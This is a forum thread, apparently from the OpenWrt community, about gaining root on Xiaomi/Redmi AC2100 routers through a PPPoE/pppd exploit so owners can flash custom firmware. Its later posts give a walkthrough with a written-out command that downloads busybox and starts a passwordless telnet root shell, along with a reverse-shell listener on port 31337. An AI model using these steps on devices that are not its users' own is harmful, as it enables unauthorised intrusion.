New Xiaomi router AC2100

This might be a silly question, but why exactly are you trying to solder on SPI flash?

Did you already manage to destroy the endurance on your chips?

You can already toggle on uart_en and bootdelay without having to desolder and put it in a programmer too...

On Xiaomi Mi3G this help in case you have badblocks on NAND, or your bootloader is corrupt. With help of SPI you could restore NAND or make a dual boot...

Are you measured DI, DO, CLK and CS from SPI?Is the same with pins from NAND? GND and VCC is sure, but I don't know how enable CHIP_SELECT after, because I don't have any jumper on mainboard. As far as I know pin 9 on the NAND is the one responsible for CHIP_SELECT but possible to be something else. Unfortunately under NAND don't have any SPI circuits:

Yes I know, but I have the modified firmware of the RM2100 in my R2100, therefore I can only upgrade with the R2100 software. The good thing is that it works without any problems, I still would prefer to have the right kernel for my device installed that I can install the right original firmware.
So is there any way to extract a flashable kernel image from the firmware.bin or can we only do it from an installation by dumping the kernel partition??

Did anyone succeeded in exploiting AC2100 OEM firmware using this: ?

It seems PatrickM managed to get it working (eventually) earlier in the thread, so at least I know it works on at least one other person's unit...

Do note that it does target 1.0.14, as that's the one image downloadable on the Xiaomi site one can recover to at the moment. I would encourage people to save themselves a copy. I don't think Xiaomi would be able to effectively stop downgrades/recovery to that image without flashing a new u-boot version with the image blacklisted, but I don't think they'd do that in the field as they haven't done it before.

I've been working on documenting the general process on the OpenWrt wiki and getting the RM2100/Redmi Router AC2100 into master in the meantime.

I think I messed up the article creation though.



this expilot
work for black cylinder AC2100 r2100 v2.0.376



Yes it does work i've used it on the black cylinder AC2100 model. Please don't spread false info. If it doesn't work on first try just run the script again until it does.

Hello @patrickm

It might even work for AX3600 as the firmware version it has is 1.0.20

The pppd may be exploitable in the same way but the script will not work, AX3600 is ARM based not MIPS

Thank you @namidairo for exploit! :slightly_smiling_face: I tested on Redmi AC2100, bootloader breed-mt7621-xiaomi-r3g.bin and i can confirm is working.

All firmware from Xiaomi Mi3G is working, i tested Pandora, Padavan and OpenWRT, except 5Ghz band and of course the missing USB.

Yeah... The only reason that would vaguely work is because of the similar flash layout.

Please don't flash mir3g images. It's likely one of your lan ports isn't initialised, and your led setup will be all wrong. (And the whole not having the 7615 working)

1 Like

I'd be pleasantly surprised if it did work on the R2100 as well, as I have hardcoded addresses to rop gadgets, sleep and the stack.

Hi. Where can I find proper images for it:

Because thorsten97 link is not working.

You still can download the 1.0.11 OFW.

Can you try port it to MiWiFi AX3600? For most WiFi 6 router, have one shell is better than nothing.

To make the exploit a bit easier I made a script simulating a PPPoE server. I tested it on Windows and Linux with the RM2100 router and it was able to successfully set up the connection. I only tried the reboot exploit and it successfully triggers it. If anyone could try it with the black cylinder and see if it works with the reverse shell I would be thankful :grinning:
EDIT: If your router mac address doesn't start with 88:c3:97 (mine starts with 8c:53:c3) the exploit script might send the package the wrong way. In that case you have to switch dst an src or hardcode your mac address @namidairo any idea if this could be fixed?

1 Like

It should be possible to get router MAC from the PADI packet.

To make it really easy it would be nice to use only the WAN port, so i'm going to try to setup a working PPPoE connection for accessing the shell. But i have to figure out how to change exploit payload first :P.

The PADI doesn't contain the necessary Session ID (Could be hardcoded in my script) and if the exploit triggers to early it doesn't respond to the MD5 Challenge.
Yeah would be great if it would work with WAN port only. I'm currently helping someone with the setup and wrote a small tutorial how to do it with WAN + Android phone^^ Since I'v already written it I'll attach it if anyone is interested.

On Android:

  • Download "NetTools" and "Simple-HttpServer"
  • In NetTools check Listen and enter 31337 for Port
  • In Simple-HttpServer go to Setting and set the Document Root to "/storage/emulated/0/Download"
  • Use your browser to download busybox-mipsel from here:
  • Put this into your clipboard: wget -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh
  • Change your Wifi to the Xiaomi one and edit your Ip to
  • Go to and make sure you set your Internet settings to PPPoE, Automatic configuration with user "a" and password "a"
  • In Simple-HttpServer make sure it says at the top and switch the button to on
  • Go to NetTools and press listen at the bottom
    On PC:
  • Enter your Interface name into both scripts
  • Replace "88:c3:97" in "src.startswith("88:c3:97")" with the first halve of your router mac address
  • Start and
  • Restart until you get a Connected on NetTools
    On Android:
  • Paste "wget -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh" from your clipboard
    On PC:
  • Connect your PC to one of the LAN ports
  • If everything worked, you can now use Putty to connect to telnet on without a password
1 Like

Hi Percy, great work! One question... Can I directly modify the Mac ID in the script ?
' if src.startswith("88:c3:97") :
src,dst = dst,src '
change to
' if src.startswith("8c:53:c3") :
src,dst = dst,src'